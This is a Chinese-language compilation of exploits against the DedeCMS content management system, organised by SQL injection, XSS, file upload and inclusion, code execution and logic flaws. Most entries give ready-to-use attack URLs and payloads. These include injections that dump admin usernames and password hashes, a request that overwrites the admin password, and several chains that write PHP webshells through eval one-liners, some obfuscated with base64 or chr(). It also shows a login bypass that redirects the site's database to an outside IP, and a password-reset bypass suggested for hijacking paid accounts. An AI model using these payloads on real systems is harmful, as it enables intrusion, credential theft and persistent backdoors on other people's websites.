Dedecms 漏洞合集
SQL 注入
Dedecms /member/reg_new.php SQL 注入漏洞
1 | /member/reg_new.php?dopost=regbase&step=1&mtype=%B8%F6%C8%CB&mtype=%B8%F6%C8%CB&use |
参考文章:http://www.dedeyuan.com/xueyuan/azsy/3175.html http://www.dede58.com/a/zhimengjiaocheng/dedefault/8051.html
Dedecms /member/buy_action.php SQL 注入漏洞
看漏洞分析文章。 参考文章:http://www.vuln.cn/6162 https://blog.csdn.net/jay900323/article/details/41311407
Dedecms /member/buy_action.php SQL 注入漏洞
在网站栏目管理中修改网站栏目的名称,可以把 123 改成 123‘;echo phinfo();# 内容是网 站栏目的名称
点击搜索,加载缓存文件
在服务器中查看文件
参考文章:https://www.secpulse.com/archives/37218.html
Dedecms 5.7 plus/guestbook.php 注入漏洞
利用前提
1 | http://localhost/Dedecms5.7/plus/guestbook.php |
POC,msg 存在 SQL 注入
1 | http:/127.0.0.1/plus/guestbook.php?action=admin&job=editok&id=146&msg=',msg=@`'`,msg=(selecT CONCAT(userid,0x7c,pwd) fRom `%23@__admin` LIMIT 0,1),email=' |
参考文章:https://www.cnblogs.com/LittleHann/p/4521599.html
Dedecms 5.7 /plus/recommend.php SQL 注入漏洞
FILES[type][tmpname]参数存在 SQL 注入,type 和 tmp_name 是可变的
1 | http://127.0.0.1/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\' or mid=@`\'` /*!50000union*//*!50000select*/1,2,3,(select CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`limit+0,1),5,6,7,8,9%23@`\'`+&_FILES[type][name]=1.jpg&_FILES[type] [type]=application/octet-stream&_FILES[type][size]=111 |
java 源码工具如下:
1 | package org.javaweb.dede.ui; |
参考文章:https://www.freebuf.com/sectool/27206.html
Dedecms v5.1 /tag.php SQL 注入漏洞
利用工具:点我下载
参考文章:https://www.jb51.net/hack/34757.html
Dedecms 5.1 /plus/infosearch.php SQL 注入漏洞
使用浏览器访问
http://www.xxxxx.com/plus/search.php?keyword=as&typeArr[ uNion ]=a
报错如果为:Safe Alert: Request Error step 2 !
则利用以下 exp:
1 | http://www.xxxxx.com/plus/search.php?keyword=as&typeArr[111%3D@`\’ |
报错如果为:Safe Alert: Request Error step 1 !
则利用以下 exp:
1 | http://www.xxxxxx.com/plus/search.php?keyword=as&typeArr[111%3D@`\’ |
参考文章:http://www.nxadmin.com/web/1043.html
DEDECMS 5.1 /plus/feedback_js.php SQL 注入漏洞
参数 arurl 存在 SQL 注入。
1 | http://st0p/Dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''=' |
参考文章:https://www.cnblogs.com/milantgh/p/3616016.html
Dedecms V5.7 SP1 /member/mtypes.php SQL 注入漏洞
1.首先打开: http://127.0.0.1/Dedecms5.5/member/mtypes.php
添加一个分类,记住 ID(1),和原来的分类名称(fenlei)
然后打开:
http://127.0.0.1/Dedecms5.5/member/mtypes.php?dopost=save&mtypename[1' or @' AND 1%3D1 and (select 'r')%3D'r' and '1'%3D'1]=4
//将其中的 1 改成你的分类 ID结束之后打开之后返回: http://127.0.0.1/Dedecms5.5/member/mtypes.php //如果(select ‘r’)=’r’的话 那么分类名称就被改成了 4! 这样我们就能来判断是否满足条件了,二值判断注入
参考文章:https://www.cnblogs.com/LittleHann/p/4518862.html
Dedecms 5.7 /plus/flink_add.php SQL 注入漏洞
网站要支持友链,Post 请求中的 logo 参数存在 SQL 注入
http://127.0.0.1/plus/flink_add.php
1 | Submit=%20%E6%8F%90%20%E4%BA%A4%20&dopost=save&email=&logo=,if(@`'`,0x7c,(select |
成功将 logo 的值写为构造语句的结果,并发布出来。(用户名密码)
参考文章:https://www.seebug.org/vuldb/ssvid-89275
http://wooyun.webbaozi.com/bug_detail.php?wybug_id=wooyun-2014-051950
http://ju.outofmemory.cn/entry/81870
Dedecms 5.7 member/ajax_membergroup.php SQL 注入漏洞
参数 membergrop 存在 SQL 注入
http://127.0.0.1/member/ajax_membergrop.php?action=post&member=
参考文章:http://www.vfocus.net/art/20120504/9998.html
Dedecms v5.7 plus\feedback.php SQL 注入漏洞
参数 aid 存在 sql 注入,需要验证码
http://127.0.0.1/plus/feedback.php?aid=
poc 如下
1 | <html> <head> <title>Dedecms v5. feedback.php exp</title> <meta http-equiv="Content-Type" content="text/html; charset=gb2312"> <script language='javascript'> y = document.form1.addr.value; |
参考文章:https://www.bbsmax.com/A/pRdBnWA9dn/
Dedecms 5.7 plus/search.php SQL 注入漏洞
uNion 部分存在 SQL 注入
http://webshell.cc/plus/search.php?keyword=as&typeArr[ uNion ]=a
参考文章:https://blog.csdn.net/p656456564545/article/details/16112581
Dedecms 5.7 include/dedesql.class.php SQL 注入漏洞
构造 SQL 语句 (提交的时候用 ascii 加密,程序会帮我们自动解密的,所以无视 gpc):
1 | admin` SET `userid`='spider', `pwd`='f297a57a5a743894a0e4' where id=1 # |
完整 SQL 语句:
1 | UPDATE `dede_admin` SET `userid`='spider', `pwd`='f297a57a5a743894a0e4' where id=1 #_downloads` SET downloads = downloads + 1 WHERE hash='$hash' |
EXP:
1 | http://localhost/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=97&arrs2[]=100&arrs2[]=109&arrs2[]=105&arrs2[]=110&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=117&arrs2[]=115&arrs2[]=101&arrs2[]=114&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=115&arrs2[]=112&arrs2[]=105&arrs2[]=100&arrs2[]=101&arrs2[]=114&arrs2[]=39&arrs2[]=44&arrs2[]=32&arrs2[]=96&arrs2[]=112&arrs2[]=119&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=102&arrs2[]=50&arrs2[]=57&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=97&arrs2[]=55&arrs2[]=52&arrs2[]=51&arrs2[]=56&arrs2[]=57&arrs2[]=52&arrs2[]=97&arrs2[]=48&arrs2[]=101&arrs2[]=52&arrs2[]=39&arrs2[]=32&arrs2[]=119&arrs2[]=104&arrs2[]=101&arrs2[]=114&arrs2[]=101&arrs2[]=32&arrs2[]=105&arrs2[]=100&arrs2[]=61&arrs2[]=49&arrs2[]=32&arrs2[]=35 |
如果不出问题,后台登录用户 spider 密码 admin 漏洞真的不止一处,各种包含,远程代码执行,很多,列位慢慢研究。 如果找不到后台,参见以前修改数据库直接拿 SHELL 的方法
1 | UPDATE `dede_mytag` SET `normbody` = '{dede:php}file_put_contents(''spider.php'',''<!--?php eval($_POST[spider]);?- ->'');{/dede:php}' WHERE `aid` =1 LIMIT 1 ; |
getshell:
1 | http://localhost/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=116&arrs2[]=97&arrs2[]=103&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=96&arrs2[]=32&arrs2[]=61&arrs2[]=32&arrs2[]=39&arrs2[]=123&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=102&arrs2[]=105&arrs2[]=108&arrs2[]=101&arrs2[]=95&arrs2[]=112&arrs2[]=117&arrs2[]=116&arrs2[]=95&arrs2[]=99&arrs2[]=111&arrs2[]=110&arrs2[]=116&arrs2[]=101&arrs2[]=110&arrs2[]=116&arrs2[]=115&ars2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=120&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=39&arrs2[]=39&arrs2[]=44&arrs2[]=39&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&ar |
会在 plus 目录生成 x.php 密码 m http://127.0.0.1/plus/x.php update 成功后还要访问下
/plus/mytag_js.php?aid=1
参考文章:https://www.hedysx.com//bug/1272.html
Dedecms2007 group/search.php 注入漏洞
参数 keyword 存在 sql 注入
http://127.0.0.1/dg/group/search.php?sad=g&keyword=%cf'
参考文章:https://www.seebug.org/vuldb/ssvid-3926
Dedecms V5 orderby 参数注射漏洞
参数 orderby 存在 sql 注入
http://127.0.0.1/member/guestbook_admin.php?dopost=getlist&pageno=1&orderby=11
参考文章:https://www.seebug.org/vuldb/ssvid-3824
https://blog.csdn.net/weixin_34021089/article/details/86149637
Dedecms V5.6 plus/advancedsearch.php 任意 sql 语句执行漏洞
参数 sql 存在 SQL 注入。
http://127.0.0.1/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20
%23@__admin`
参考文章:https://www.seebug.org/vuldb/ssvid-19796
DedeCMS SQL Injection Vulnerability
参数 id 存在 SQL 注入
1 | http://127.0.0.1/list.php?id=[sql] |
参考文章:https://www.seebug.org/vuldb/ssvid-26137
Dedecms plus/infosearch.php 文件注入漏洞
参数 q 存在 SQL 注入
http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20**select**%201,2,userid,4,pwd,6%20from%20dede_admin/*
参考文章:https://www.seebug.org/vuldb/ssvid-4452
XSS
Dedecms 存储型 xss 漏洞
在管理员后台 系统 > 支付工具 >配送方式设置 增加一个配送方式。在简要说明输入 xss
payload 即可触发漏洞。后台和前台都会触发。
后台触发
前台触发
参考文章
https://www.seebug.org/vuldb/ssvid-92863
Dedecms 存在储存型跨站脚本漏洞
前台用户登录下单,在街道地址填写 xss 跨站代码。
下单之后自己的消费中心页面可以看到 xss 漏洞 触发
同样在管理员后台也触发 xss 漏洞
参考文章
https://www.seebug.org/vuldb/ssvid-92855
Dedecms referer xss 跨站
参考文章
https://www.seebug.org/vuldb/ssvid-89657
Dedecms 织梦 v5.6 两处跨站漏洞
TotalResult、gourl 参数存在 XSS
1 | http://www.test.com/plus/search.php?keyword=zhuba&searchtype=titlekeyword&channeltype=0&orderby=&kwtype=1&pagesize=10&typeid=0&TotalResult=<iframesrc=http://www.zhuba.net>&PageNo=2 |
参考文章
https://www.seebug.org/vuldb/ssvid-19526
Dedecms 织梦 v5.5 两处跨站漏洞
Keyword、TotalResult 存在 XSS。
1 | http://www.Dedecms.com/plus/search.php?keyword="><iframesrc=http://www.gohack.org>&searchtype=titlekeyword&channeltype=0&orderby=&kwtype=1&pagesize=10&typeid=0&TotalResult=<iframe src=http://www.gohack.org>&PageNo=2 |
参考文章
https://www.seebug.org/vuldb/ssvid-19284
Dedecms 5.7 config.php 跨站脚本漏洞
adminDirHand 参数存在 XSS。
http://127.0.0.1/Dedecms/include/dialog/config.php?adminDirHand="/></script><script\>alert(1);</script>
参考文章
https://www.seebug.org/vuldb/ssvid-61209
Dedecms 5.7 /images/swfupload/swfupload.swf 跨站脚本漏洞
movieNane 参数存在 XSS。
http://localhost/Dedecms/uploads/images/swfupload/swfupload.swf?movieName="])}catch(e){if(!window.x){window.x=1;alert("bug1024")}}//
参考文章
https://www.seebug.org/vuldb/ssvid-62579
DEDECMS \dede\templets\login.htm gotopage 变量 XSS
gotopage 参数存在 xss。
1 | http://v57.demo.Dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x=" |
参考文章
https://www.seebug.org/vuldb/ssvid-21023
DEDECMS 跨站及爆绝对路径漏洞
参数 gurl 存在 xss。
http://127.0.0.1/dc/include/jump.php?gurl=%23"</script><script>alert(/00day.cn/)</script>/*
参考文章
https://www.seebug.org/vuldb/ssvid-4125
Dedecms <=5.7 member-login.php 跨站脚本攻击漏洞
gourl 参数存在 XSS。
http://127.0.0.1/dc/member/login.php?gourl=%23"</script><script>alert(/00day.cn/)</script>/*
Dedecms 5.x catalog_tree.php 跨站脚本攻击漏洞
Bt、v、f 参数存在 xss 漏洞
1 | [Dedecms WebSite]/dede/catalog_tree.php?f=form1&opall=1&v=typeid&bt=[XSS] |
Dedecms 5.x jump.php 跨站脚本攻击漏洞
gurl 参数存在 XSS。
http://127.0.0.1/dc/include/jump.php?gurl=%23"</script><script>alert(/00day.cn/)</script>/*
Dedecms 5.x article_keywords_select.php 跨站脚本攻击漏洞
f 参数存在 XSS。
[Dedecms WebSite]/dede/article_keywords_select.php?f=[XSS]
Dedecms 5.x pic_view.php 跨站脚本攻击漏洞
Activepath 存在 xss。
[Dedecms WebSite]/dede/file_pic_view.php?activepath=[XSS]
Dedecms 5.x content_list.php 跨站脚本攻击漏洞
Arcrank、cid、keyword、orderby、adminid 存在 XSS。
1 | [Dedecms WebSite]/dede/content_list.php?arcrank=[XSS] |
Dedecms 5.x select_images.php 跨站脚本攻击漏洞
f 参数存在 xss。
[Dedecms WebSite]/include/dialog/select_images.php?f=[XSS]
Dedecms 5.x file_pic_view.php 跨站脚本攻击漏洞
Activepath 参数存在 XSS。
[Dedecms WebSite]/dede/file_pic_view.php?activepath=[XSS]
文件上传/文件包含/文件读取/文件删除
Dedecms V5.7 SP2 前台文件上传漏洞
漏洞复现
进入会员中心,必须是管理员的权限,因为后面上传文件有权限限制。进入会员中心后进入内容中心模块,然后发布一个文章。点击下面的编辑器的上传图片按钮。
点击上传,选择准备好的一句话图片木马文件
再用 burp 工具抓包,将 1.jpg 改为 1.jpg.p*hp
重新请求发送数据包,成功的 getshell 了,并返回了木马地址
用中国菜刀连接看看,成功连接
参考文章
https://mp.weixin.qq.com/s/PCg973wOTeVYvb8-b6R3ZA
Dedecms 5.6 /plus/carbuyaction.php 本地文件包含漏洞
漏洞复现
参数 code 存在文件包含
http://127.0.0.1/plus/carbuyaction.php?dopost=**return**&code=../../uploads/userup/2/12Ka5357-c53.jpg
windows 系统
1、IIS 或者某些 apache 版本下 php 文件系统可以进行路径截断,可以通过///////////////////////////////////(若干/)/././././././././././././././././(若干/.)进行截断。
2、于是可以上传一个精心构造带有恶意 php 代码的图片,然后注册一个用户上传,比如上传到uploads/userup/2/12Ka5357-c53.jpg,于是可以通过访问:
http://127.0.0.1/plus/carbuyaction.php?dopost=return&code=../../uploads/userup/2/12Ka5357-c53.jpg///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////(若干/)
则有可能执行 12Ka5357-c53.jpg 中的恶意 php 代码,从而达到入侵的目的。
linux 系统
1、apache 某些版本 php 文件系统支持路径截断,于是同 windows 下,可以通过///////////////////////////////////(若干/)/././././././././././././././././(若干/.)进行截断。
利用方法同 windows:
2、于是可以上传一个精心构造带有恶意 php 代码的图片,然后注册一个用户上传,比如上传到uploads/userup/2/12Ka5357-c53.jpg,于是可以通过访问:
http://127.0.0.1/plus/carbuyaction.php?dopost=return&code=../../uploads/userup/2/12Ka5357-c53.jpg///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
(若干/)
则有可能执行 12Ka5357-c53.jpg 中的恶意 php 代码,从而达到入侵的目的。
参考文章
http://blog.sina.com.cn/s/blog_ec459d060102wozd.html
Dedecms V5.6 远程文件删除漏洞
漏洞复现
参数 oldface 存在远程文件删除漏洞,由于有限制,只能删除 jpg、gif 、png 文件
http://ssvdb.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif
参考文章
https://www.seebug.org/vuldb/ssvid-19893
select_soft_post.php 页面变量未初始漏洞
漏洞复现
其漏洞利用前提是 register_globals=on,可以通过自定义表单为相关的变量赋值。
利用如下 poc(html 代码)进行提交,需自行修改对应网站地址
1 | <html> |
参考文章
http://huaidan.org/archives/3386.html
https://www.seebug.org/vuldb/ssvid-12518
DEDECMS member/uploads_edit.php 上传GETSHELL
漏洞复现
将以下内容保存为 1.gif
1 | Gif89a{dede:field name='toby57' runphp='yes'} |
构造如下表单,上传后图片保存为/uploads/userup/3/1.gif
1 | <form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data"> |
发表文章,然后构造修改表单如下:
1 | <form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data"> |
参考文章
https://www.seebug.org/vuldb/ssvid-20049
Dedecms 最新版本后台 getshell
漏洞复现
后台上传处
上传图片抓包
然后把 filename 修改一下
然后访问路径
参考文章
https://www.seebug.org/vuldb/ssvid-96574
Dedecms v5.5 datalistcp.class.php Getshell
EXP:
1 |
|
参考文章
https://www.seebug.org/vuldb/ssvid-24262
命令执行/代码执行
Dedecms5.3 – 5.5 plus/digg_frame.php 代码注入漏洞
访问网址:
http://www.abc.com/plus/digg_frame.php?action=good&id=1024%651024&mid=*/eval($_POST[x]);var*_dump(3);?>
* 可看见错误信息访问 http://www.abc.com/data/mysql_error_trace.php 看到以下信息证明注入成功了。
1
2
3int(3) Error: Illegal double '1024e1024' value found during parsing Error sql:
Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1;
*/ ?>执行 dede.rar 里的文件 test.html,注意 form 中 action 的地址是
1
<form action=”http://www.abc.com/data/mysql_error_trace.php” enctype=”application/x-www-form-urlencoded” method=”post”>
按确定后的看到第 2 步骤的信息表示文件木马上传成功.
参考文章:https://blog.csdn.net/gmnet/article/details/7304743
Dedecms 5.7 SP1 /install/index.php 远程写文件漏洞
漏洞复现
在自己服务器根目录建立 Dedecms 目录,然后在目录下建立 demodata.a.txt($s_lang 变量
覆盖为 a),内容为
1 |
|
访问这个 url:
http://192.168.204.135/install/index.php.bak?step=11&insLockfile=a&s_lang=a&install_demo_name=../data/admin/config_update.php
这会让代码到 http://updatenew.Dedecms.com/base-v57/Dedecms/demodata.a.txt 中取内容写入到 config_update.php,demodata.a.txt 如下图:
访问 PoC 之后 config_update.php 文件内容如下图
这样 updataHost 变量值便没有被初始化了,之后我们想写什么就可以些什么了。这里我们用下面的这个 url 做测试:
http://192.168.204.135/install/index.php.bak?step=11&insLockfile=a&s_lang=a&install_demo_name=../data/tang3.php&updateHost=http://192.168.1.1/
//192.168.1.1 服务器为存 demodata.a.txt 文件的服务器
访问 http://192.168.204.135/data/tang3.php,效果如下图
参考文章
https://www.seebug.org/vuldb/ssvid-89362
https://www.seebug.org/vuldb/ssvid-89354
Dedecms v5.6 嵌入恶意代码执行漏洞
漏洞复现
注册会员,上传软件,在本地地址中填入
a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}
发表后查看或修改即可执行
若填入以下内容,则可生成 webshell
a{/dede:link}{dede:toby57name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
生成 x.php 密码:xiao 直接生成一句话。密码 xiao 大家懂得
参考文章
https://www.seebug.org/vuldb/ssvid-20352
Dedecms v5.1 WriteBookText() 代码注入漏洞
漏洞复现
前提是服务器开放会员系统,而且有图书连载里有类别。
利用方法
http://www.target.com/member/story_add_content_action.php?body=eval($_POST[c]);&chapterid=1
这样就在 data/textdata/目录下生成小马。 默认为 data/textdata/1/bk1.php
而后打开 http://www.taget.com/data/textdata/1/bk1.php 就是咱们生成后门。假如一次没
成功想再重来一遍的话,下次生成的文件就变成 bk2.php。以此类推。
参考文章
https://www.seebug.org/vuldb/ssvid-3249
https://blog.csdn.net/hackcode/article/details/2715155
http://blog.chinaunix.net/uid-28997055-id-4290330.html
Dedecms 5.7 友情链接模块注入漏洞(getshell)
漏洞复现
先上 exp
1 |
|
首先,将这个 exp 部署在你的服务器上,当然你必须要有一个公网 ip,假设你的 url 为:http://www.xxxx.com/exp.php
在目标网站的申请友情链接处申请一个友情链接
提交之后等待管理员审核,当管理员审核的时候,一般情况下会点进你的网站看一看
审核的地方在 后台—》模块—》辅助插件—》友情链接
当点这个友情链接的时候,就生成了一句话 shell,shell 地址在//include/taglib/shell.lib.php
管理员触发了一个链接
http://127.0.0.1/Dedecms-V5.7-UTF8-SP1-Full/uploads/dede/tpl.php?action=savetagfile&actiondo=addnewtag&content=%3C?@eval($_POST[%27c%27]);?%3E&filename=shell.lib.php
这个链接是利用管理员的权限生成了一句话
Dedecms 5.7 soft-edit.php 代码执行漏洞
漏洞复现
添加上传软件 本地地址 http://www.hao123.com 其它乱填就行,添加成功后,再次进入修
改界面 软件地址改为:
http://www.hao123.com}x{/dede:link}{dede:atext'=x']=0;eval(chr(101).chr(118).chr(97).chr(108).chr(40).chr(34).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(93).chr(59).chr(34).chr(41).chr(59));// }xxxx{/dede:a}{dede:link}xxx
注意,这里后面多了 xxx ,是为了绕过正则补丁。然后执行完全没有压力!
参考文章
Dedecms 5.7 后门漏洞
漏洞复现
使用以下 EXP 可触发,shell 地址为*/plus/dst.php*,密码为 cmd
1 |
|
参考文章
https://www.webshell.cc/3413.html
Dedecms V5.7 后台的两处 Getshell(CVE-2018-9175)
漏洞复现
1、 第一处
把语句写入 inc 文件,然后在其他的 include 语句中,包含了恶意代码进而 getshell。
访问如下链接,写入
http://localhost/Dedecms/uploads/dede/sys_verifies.php?action=getfiles&refiles[0]=123&refiles[1]=\%22;eval($*_GET[a]);die();//
此时写入 shell 成功,触发 shell 链接如下
http://localhost/Dedecms/uploads/dede/sys_verifies.php?action=down&a=phpinfo();
2、 第二处
需要先往数据库里写入内容,然后文件内容从数据库取值
访问如下链接,写入
http://localhost/Dedecms/uploads/dede/stepselect_main.php?action=addenum_save&ename=2334&egroup=;phpinfo();$&issign=1
此时 php 被写入了数据库,此时直接查询,便可以写入文件,写文件 url 如下:
http://localhost/Dedecms/uploads/dede/sys_cache_up.php?step=2&egroup=a=1;phpinfo();&dopost=ok
参考文章
https://www.cnblogs.com/WhiteHatKevil/p/10226726.html
Dedecms V5.6 Final 模板执行漏洞
漏洞复现
1.上传一个模板文件:
注册一个用户,进入用户管理后台,发表一篇文章,上传一个图片,然后在附件管理里,把
图片替换为我们精心构造的模板,比如图片名称是:
uploads/userup/2/12OMX04-15A.jpg
模板内容是(如果限制图片格式,加 gif89a):
1 | {dede:name runphp='yes'} |
2.修改刚刚发表的文章,查看源文件,构造一个表单:
1 | <form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data" onsubmit="return checkSubmit();"> |
提交,提示修改成功,则我们已经成功修改模板路径。
3.访问修改的文章:
假设刚刚修改的文章的aid为2,则我们只需要访问:
http://127.0.0.1/dede/plus/view.php?aid=2
即可以在plus目录下生成webshell:1.php
参考文章
https://www.seebug.org/vuldb/ssvid-20050
Dedecms 标签远程文件写入漏洞
前题条件,必须准备好自己的dede数据库,然后插入数据:
1 | insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}''); |
再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。
1 | <form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction();"> |
参考文章
https://www.seebug.org/vuldb/ssvid-20856
https://www.cnblogs.com/LittleHann/p/4236517.html
DedeCMS-5.8.1 SSTI模板注入导致RCE
漏洞复现
先上POC:
1 | GET /plus/flink.php?dopost=save&c=id |
以下(非详尽的)列表路径可以到达该漏洞:
/plus/flink.php?dopost=save
/plus/users_products.php?oid=1337
/plus/download.php?aid=1337
/plus/showphoto.php?aid=1337
/plus/users-do.php?fmdo=sendMail
/plus/posttocar.php?id=1337
/plus/vote.php?dopost=view
/plus/carbuyaction.php?do=clickout
/plus/recommend.php
…
逻辑漏洞
Dedecms 5.7 $_COOKIE 登录绕过漏洞
漏洞复现
1.注册 0000001 账户(用于登录 admin,其他账户类推)
2.注入 Payload 并获安全校验值
3.
参考文章
https://www.seebug.org/vuldb/ssvid-97087
Dedecms 前台任意用户密码修改
漏洞复现
先注册一个帐号并登录,然后访问:
http://localhost//member/resetpassword.php?dopost=safequestion&safequestion=0.0&safeanswer=&id=1
当我们访问完 payload 时,链接会自动跳转到
http://localhost/Dedecms/member/resetpassword.php?dopost=getpasswd&id=1&key=34qn8KnX
跳转到用户密码修改页面
但是默认情况下,admin 在会员中心是静止登录的,也就是说即使你修改成功了 admin 会员的密码,还是不能登录 admin,但是其他的会员就可以随意登录。比如一些论坛的资源教程需要 vip,你可以修改 vip 用户的密码,然后猥琐欲为
参考文章
https://www.seebug.org/vuldb/ssvid-97074
织梦(Dedecms) v5.6-5.7 越权访问漏洞(直接进入后台)
漏洞复现
访问如下链接:
http://127.0.0.1/后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
把上面 validate=dcug 改为当前的验证码,即可直接进入网站后台。此漏洞的前提是必须得到后台路径才能实现
参考文章
https://www.seebug.org/vuldb/ssvid-20859
其他
Dedecms 后台地址爆破漏洞
漏洞复现
include/dialog/select_soft.php 文件可以爆出 DEDECMS 的后台,以前的老板本可以跳过登陆验证直接访问,无需管理员帐号,新版本的就直接转向了后台.
include/dialog/config.php 会爆出后台管理路径
include/dialog/select_soft.php?activepath=/include/FCKeditor 跳转目录
include/dialog/select_soft.php?activepath=/st0pst0pst0pst0pst0pst0pst0pst0p 爆出网站绝对路径
但是现在 Dedecms5.7sp1 是无法爆后台地址的,dede 会提示:提示:需输入后台管理目录才能登录
参考文章
https://blog.csdn.net/forest_fire/article/details/50944690
DEDECMS 会员中心代码投稿缺陷可 getshell
漏洞复现
应该也算任意文件读取?
利用前提:该漏洞需会员中心,且需开启软件栏目才能利用。
在会员中心代码投稿处,服务器名称填写为(本地地址可随意填写)
/}{dede:test src=../robots.txt/}{dede:${include$z[1][4][src]/**}**/ }/}
“../robots.txt”可替换成成查看该文章后触发
参考文章